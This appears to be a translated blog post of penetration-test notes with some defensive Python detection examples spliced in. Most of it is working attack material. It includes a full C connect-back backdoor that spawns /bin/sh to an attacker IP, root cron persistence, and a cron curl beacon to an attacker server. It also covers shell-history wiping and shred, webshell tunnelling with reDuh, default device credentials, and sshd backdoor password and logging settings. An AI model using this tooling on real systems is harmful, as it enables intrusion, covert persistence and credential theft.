Fixing the missing tty for su after an nst reverse-shell backdoor connects to nc, plus intranet penetration-test notes

Source: Internet
Author: User

After the nst reverse-shell backdoor connects back to nc, su cannot be used; it fails with:
standard in must be a tty
Solution:
python -c 'import pty; pty.spawn("/bin/sh")'
The resulting shell has a pty and su works in it.

PS: several noteworthy cases from a recent penetration test, recorded below:

1. Do not record shell history:
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

2. history
n: a number; lists the last n commands.
-c: clears all history in the current shell.
-a: appends the newly added history commands to histfiles; if histfiles is not given, writes to ~/.bash_history by default.
-r: reads the content of histfiles into the history memory of the current shell.
-w: writes the current history memory to histfiles.

3. The correct way to delete a file is shred:
shred -n 31337 -z -u file_to_delete
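The three tricks above (the pty upgrade, the history-disabling one-liner and shred -u) all leave characteristic command lines behind wherever commands are logged. As an added example that is not part of the original notes, the following Python script runs a few regular expressions over a constructed batch of command lines of the kind a shell-audit or execve logger forwards, and tags each match. The sample commands and the pattern names are my own.

```python
import re
from typing import Dict, List

# Constructed sample of command lines as an auditd execve log or a bash
# syslog forwarder might deliver them; not real data from any host.
SAMPLE_COMMANDS = [
    "cd /var/www/html",
    "unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; "
    "export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0",
    "ls -la",
    "history -c",
    "export HISTSIZE=1000",
    "shred -n 31337 -z -u /tmp/tool",
    "python -c 'import pty; pty.spawn(\"/bin/sh\")'",
]

# One pattern per anti-forensic trick from the notes above. The names are
# arbitrary labels chosen for this example.
PATTERNS = {
    "history_unset": re.compile(r"\bunset\s+[^;|&]*\bHIST(FILE|SIZE|ORY)\b", re.I),
    "histfile_to_null": re.compile(r"\bHISTFILE=/dev/null\b"),
    "histsize_zero": re.compile(r"\bHIST(FILE)?SIZE=0\b"),
    "history_clear": re.compile(r"\bhistory\s+-c\b"),
    "shred_unlink": re.compile(r"\bshred\b[^;|&]*\s-[a-z]*u\b"),
    "pty_upgrade": re.compile(r"pty\.spawn\("),
}


def classify(cmd: str) -> List[str]:
    """Return the names of every pattern that matches one command line."""
    return [name for name, rx in PATTERNS.items() if rx.search(cmd)]


def scan(commands) -> List[Dict]:
    """Classify a sequence of command lines and keep only the ones with hits."""
    hits = []
    for idx, cmd in enumerate(commands):
        tags = classify(cmd)
        if tags:
            hits.append({"line": idx, "tags": tags, "cmd": cmd})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_COMMANDS):
        print(f"line {hit['line']}: {', '.join(hit['tags'])}: {hit['cmd']}")
```

The patterns deliberately key on the shell variables rather than on a full command, so reordered or partially applied variants (only HISTSIZE=0, for instance) still match; a legitimate `export HISTSIZE=1000` does not.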

4. Intranet access over SSH tunneling
Use an SSH tunnel as a SOCKS proxy: plink root@<public ip> -D 127.0.0.1:8080, then set the browser's (IE) SOCKS5 proxy to 127.0.0.1:8080 to reach intranet addresses such as http://192.168.0.1.

5. A port-forwarding tool, proxy, written in C++ and modified by me; two versions, one taking parameters and one reading a configuration file. The source code will be published later.
/usr/local/bin/proxy 2080 192.168.0.7 80 forwards port 80 of 192.168.0.7 to port 2080 on the local machine.

6. On Windows, the SuperO Doctor III management backend can be used together with VNC (a management tool for Supermicro motherboards, somewhat similar to IPMI).
Note that because SuperO Doctor III bundles the Xitami web server, TridiaVNC, SndMail 2.1 and WMI (Windows Management Instrumentation) Core 1.5, different accounts and passwords are needed to change settings: the system logon and Xitami web server default account/password is ADMIN/ADMIN, while the TridiaVNC password is abcde; neither is the Windows administrator account.

7. "Welcome to EIS System!"
Default Telnet username and password of the device: admin/admin.

8. reDuh, a useful tool, maps intranet ports through the HTTP service on the HTTP or HTTPS port:
The server side comes in ASP, JSP and PHP versions. Download: http://www.sensepost.com/research/reduh. A brief walkthrough of the tool:
First upload the server-side script and browse to it, e.g. http://www.xxx.com/shell/reDuh.jsp, which returns:
[reDuh error] Undefined Request
This means it is working. Locally:
D:\Tools\reDuh.2\reDuhClient> java reDuhClient www.xxx.com 80 /shell/reDuh.jsp
[Info] Querying remote JSP for usable remote RPC port
[Info] Remote RPC port chosen as 42001
[Info] Attempting to start reDuh.jsp from www.xxx.com:80/shell/reDuh.jsp and setting remote RPC port to 42001. Please wait...
[Info] reDuhClient service listener started on local port 1010
[Info] Caught new service connection on port 1010
Connect to the default local listening port 1010:
D:\Tools> nc -vv 127.0.0.1 1010
DNS fwd/rev mismatch: localhost != Vitter
localhost [127.0.0.1] 1010 (?) open
Welcome to the reDuh command line
> [createTunnel]5900:192.168.0.3:5900
Successfully bound locally to port 5900. Awaiting connections.
If this message appears, the mapping is in place. The syntax is [createTunnel]<local port>:<intranet IP>:<intranet port>.
A VNC client pointed at 127.0.0.1:5900 now reaches port 5900 of the intranet host 192.168.0.3.

9. How to learn the target's IP address when it is not fixed:
My approach is to run a script from crond on the compromised machine that periodically fetches a JSP page I wrote.
[root@cactiez etc]# cat /etc/cron.hourly/curl
#!/bin/sh
/usr/bin/curl http://xxx.xxx.com/ip/getip.jsp

The JSP code is as follows:
---------------------------- Code split line -----------------------------
<%@ page contentType="text/html; charset=GB2312" %>
<%@ page language="java" %>
<%@ page import="java.io.*" %>
<%
// Address of the client making the request, i.e. the machine running curl
String str = request.getRemoteAddr();
java.text.SimpleDateFormat formatter = new java.text.SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date currentTime = new java.util.Date();
String str_date1 = formatter.format(currentTime);
String agent = request.getHeader("user-agent");
String nameOfTextFile = "/usr/local/www/home/default-web/ip.txt";
try {
    // Overwrites the file on every request, so it only ever holds the latest entry
    PrintWriter pw = new PrintWriter(new FileOutputStream(nameOfTextFile));
    pw.println(str_date1);
    pw.println(agent);
    pw.println(str);
    pw.close();
} catch (IOException e) {
    out.println(e.getMessage());
}
%>
---------------------------- Code end split line -----------------------------
The IP address is recorded in /usr/local/www/home/default-web/ip.txt, one value per line (timestamp, user agent, address):
15:19:23
curl/7.15.5 (i686-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
123.123.123.254

10. How to stop Apache after a webshell has spawned the reverse-shell backdoor:
python -c 'import pty; pty.spawn("/bin/sh")' gives an interactive shell, and with the root password it can su, but httpd cannot be stopped from it: the parent process of this shell is httpd, so stopping httpd kills the backdoor along with it. Instead, obtain the shell from crond rather than from the webshell, and stop httpd from that one. (The reason for stopping it: only port 80 of this server is mapped from the public IP into the intranet segment, and that port 80 now needs to be forwarded across the intranet to the gateway, so the gateway can be administered remotely; once its DMZ is enabled, the other intranet servers can be reached.)
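The observation above, that a shell spawned through the webshell has httpd as an ancestor, is also the basis of a simple detection: a web server process should have no shell descendants at all. The following Python code is an added example, not from the original notes; it parses a constructed snapshot in the shape of `ps -eo pid,ppid,comm` output, walks each shell's ancestry and reports the shells hanging under a service process. The process names and PIDs are made up for the illustration.

```python
from typing import Dict, List, Tuple

# Constructed snapshot in the shape of `ps -eo pid,ppid,comm` output; not
# taken from any real host. It shows an httpd worker that spawned
# sh -> python -> sh (the pty upgrade from the notes) and, separately, a
# shell started from crond via run-parts.
SAMPLE_PS = """\
  PID  PPID COMMAND
    1     0 init
 1203     1 httpd
 1210  1203 httpd
 1311  1210 sh
 1312  1311 python
 1313  1312 sh
 1400     1 crond
 1499  1400 run-parts
 1500  1499 haha
 1501  1500 sh
 2001     1 sshd
"""

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
# Network services that have no business spawning shells.
SERVICE_PARENTS = {"httpd", "apache2", "nginx", "php-fpm"}


def parse_ps(text: str) -> Dict[int, Tuple[int, str]]:
    """Map pid -> (ppid, command name) from ps-style output, skipping the header."""
    table = {}
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) == 3:
            table[int(parts[0])] = (int(parts[1]), parts[2])
    return table


def ancestry(table: Dict[int, Tuple[int, str]], pid: int) -> List[str]:
    """Command names from pid up to the root, e.g. ['sh', 'python', 'sh', 'httpd', ...]."""
    chain = []
    seen = set()
    while pid in table and pid not in seen:
        seen.add(pid)
        ppid, comm = table[pid]
        chain.append(comm)
        pid = ppid
    return chain


def shells_under_services(table: Dict[int, Tuple[int, str]]) -> List[Tuple[int, str]]:
    """Return (pid, offending ancestor) for every shell whose ancestry passes
    through a network service. Such shells die with the service when it is
    restarted, which is exactly the situation described in the notes."""
    findings = []
    for pid, (_, comm) in table.items():
        if comm not in SHELLS:
            continue
        for anc in ancestry(table, pid)[1:]:
            if anc in SERVICE_PARENTS:
                findings.append((pid, anc))
                break
    return findings


if __name__ == "__main__":
    procs = parse_ps(SAMPLE_PS)
    for pid, anc in shells_under_services(procs):
        print(f"shell pid {pid} descends from {anc}: {' <- '.join(ancestry(procs, pid))}")
```

The shell under crond is deliberately not reported by this function: the notes show it is the one that survives an httpd restart, so a reviewer would look for it separately, by checking what cron is running (see the crontab review further down).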
Locally: nc -l -p 5555
On the server:
[root@cactiez etc]# cat /home/www/haha.c
---------------------------- Code split line -----------------------------
#include <stdio.h>
#include <stdlib.h>      /* added: the listing omitted this header, which exit() needs */
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>   /* added: the listing omitted this header, which inet_addr() needs */
int fd, sock;
int port = 5555;
struct sockaddr_in addr;
char mesg[] = ":Connect-Back Backdoor: CMD:";
char shell[] = "/bin/sh";
int main(int argc, char *argv[]) {
    while (argc < 2) {
        fprintf(stderr, "%s <ip>", argv[0]);
        exit(0);
    }
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    addr.sin_addr.s_addr = inet_addr(argv[1]);
    fd = socket(AF_INET, SOCK_STREAM, 0);
    connect(fd, (struct sockaddr *)&addr, sizeof(addr));
    send(fd, mesg, sizeof(mesg), 0);
    /* attach stdin/stdout/stderr to the socket before exec'ing the shell */
    dup2(fd, 0);
    dup2(fd, 1);
    dup2(fd, 2);
    execl(shell, "in.telnetd", (char *)0);
    close(fd);
    return 1;
}
---------------------------- Code end split line -----------------------------
[root@cactiez etc]# gcc -o /bin/haha /home/www/haha.c
[root@cactiez etc]# mkdir /etc/cr_m
[root@cactiez etc]# cp /home/www/si /etc/cr_m/
[root@cactiez etc]# chmod +x /etc/cr_m/si

[root@cactiez etc]# cat /etc/cr_m/si
#!/bin/sh
/bin/haha xxx.xx

Append a crontab entry that runs every minute (note the >> : a single > would overwrite /etc/crontab):
[root@cactiez etc]# echo "*/1 * * * * root run-parts /etc/cr_m" >> /etc/crontab
[root@cactiez etc]# cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
*/1 * * * * root run-parts /etc/cr_m
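For a defender, this persistence is visible in /etc/crontab itself: an every-minute schedule, and run-parts over a directory that is not one of the four standard cron.* directories. The following Python is an added example, not part of the original notes; it parses the system-crontab format (minute hour day month weekday user command), using a constructed copy of the listing above as input, and flags entries with either property.

```python
import re
from typing import Dict, List

# The four run-parts directories a stock /etc/crontab references.
STANDARD_RUN_PARTS_DIRS = {
    "/etc/cron.hourly", "/etc/cron.daily", "/etc/cron.weekly", "/etc/cron.monthly",
}

# Constructed copy of the /etc/crontab listing above (system crontab
# format: min hour dom mon dow user command), used here as sample input.
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
*/1 * * * * root run-parts /etc/cr_m
"""


def parse_system_crontab(text: str) -> List[Dict]:
    """Return one dict per job line; blank lines, comments and VAR=value lines are skipped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue  # malformed line; cron would complain about it too
        entries.append({
            "minute": fields[0], "hour": fields[1], "dom": fields[2],
            "month": fields[3], "dow": fields[4], "user": fields[5],
            "command": fields[6],
        })
    return entries


def review_crontab(text: str) -> List[Dict]:
    """Flag jobs a reviewer should look at: those that run every minute, and
    run-parts invocations over a directory outside the standard four."""
    findings = []
    for entry in parse_system_crontab(text):
        reasons = []
        if entry["minute"] in ("*", "*/1"):
            reasons.append("runs every minute")
        m = re.match(r"run-parts\s+(\S+)", entry["command"])
        if m and m.group(1) not in STANDARD_RUN_PARTS_DIRS:
            reasons.append("run-parts on non-standard directory " + m.group(1))
        if reasons:
            findings.append({**entry, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in review_crontab(SAMPLE_CRONTAB):
        print(f"{f['user']}: {f['command']}: {'; '.join(f['reasons'])}")
```

The same parser applies to /etc/cron.d/* files, which use the identical seven-field format; per-user crontabs from `crontab -l` have no user field and would need `split(None, 5)` instead. Whatever is found, the scripts inside the flagged directory (here /etc/cr_m/si) are the next thing to read.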
One minute later the local nc receives the connection; from that shell, stop httpd:
[root@cactiez etc]# cat /root/s.sh
#!/bin/sh
/sbin/service httpd stop
/usr/local/bin/proxy 80 192.168.0.1 80
sleep 600
killall -9 proxy
/sbin/service httpd restart
[root@cactiez etc]# /root/s.sh &
For the next ten minutes, port 80 of the public IP that reaches this machine is port 80 of the gateway 192.168.0.1. Set up the DMZ quickly and deal with the intranet machines.

11. sshd backdoor:
After applying the patch, two files need to be edited: version.h and des.h.
In version.h:
#define SSH_VERSION "OpenSSH_4.3"
The string in quotation marks is the version banner sshd announces.
In des.h:
#define _SECRET_PASSWD "passwerd"
#define _LOG_DIR "/dev/hdal"
#define _S_LOG "slog"
#define _C_LOG "clog"
These are the backdoor password and the directory and file names where captured passwords are recorded.
